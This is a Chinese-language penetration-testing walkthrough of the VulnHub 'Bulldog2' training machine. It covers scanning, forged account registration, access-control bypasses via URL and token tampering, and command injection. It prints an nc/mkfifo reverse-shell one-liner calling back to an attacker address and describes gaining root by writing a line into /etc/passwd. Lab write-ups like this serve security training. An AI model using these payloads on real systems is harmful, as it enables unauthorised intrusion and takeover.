kali滲透綜合靶機(三)--bulldog2靶機
靶機地址:https://download.vulnhub.com/bulldog/Bulldog2.ova
一、主機發現
1.netdiscover -i eth0 -r 192.168.10.0/24
二、端口掃描
1. masscan --rate=10000 -p0-65535 192.168.10.155
三、端口服務識別
1.nmap -sV -T4 -O 192.168.10.155
四、漏洞查找與利用
1.瀏覽器訪問http://192.168.10.155,發現發現登錄界面,嘗試目錄掃描,沒發現有用信息
2.查看主頁,發現我們在查看頁面的時候可以看到,頁面上有個注冊功能,但是點擊報錯。
3.查看js文件,根據js的定義,我們可以使用post提交新賬戶信息來完成注冊
4.抓包,構造數據包,然后post數據包,修改注冊成功
5.用注冊的賬戶登錄,成功登陸
6.再次注冊幾個賬號
7.測試是否存在邏輯漏洞
登錄kkk觀察網頁特點,發現url中路徑結尾和用戶名一樣,測試是否存在越權漏洞,在不登出kkk用戶的前題下,把url修改位別的用戶名,下圖可以看到成功登錄別的用戶界面,說明存在水平越權漏洞
8.測試是否存在未授權訪問漏洞
在另一個瀏覽器,訪問http://192.168.10.155/profile/sss,沒有經過身份驗證直接進入sss賬戶的管理界面
9.登錄kkk用戶,發現頁面沒什么,沒有什么可以利用的,重新登錄,抓包分析,靶機返回一個奇怪的token
10.分析token,可以看到一個可疑的參數:”auth_level”,使用這個參數去剛剛保存的js文件中收索看看
11.可以看到master_admin_user疑似管理員,嘗試用它替換掉standard_user
在burp攔截響應數據包,修改響應數據包,然后轉發
12.此時再看kkk賬戶已經變成管理員,說明存在垂直越權漏洞
13.點擊管理員
14.輸入用戶名密碼,抓包,然后在修改密碼處添加反彈shell,在攻擊端開啟監聽,發送數據包,這時攻擊端便獲得目標的shell了
反彈shell命令:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.151 1234 >/tmp/f;
15.在攻擊端查看
16.查看所有可寫的文件
find / -writable -type f 2>/dev/null |grep -v "/proc/"
17. passwd文件可以寫,直接寫入一條用戶記錄
先生成一個帶有鹽值的密碼
然后寫入passwd文件,成功寫入
18.當前不是終端,無法切換賬戶,需要新打開一個終端,然后切換賬戶成功,獲得管理員權限
python -c 'import pty;pty.spawn("/bin/bash")'
總結:
1.信息收集
2.水平越權
3.垂直越權
4.未授權訪問
5.任意賬戶注冊
6.命令執行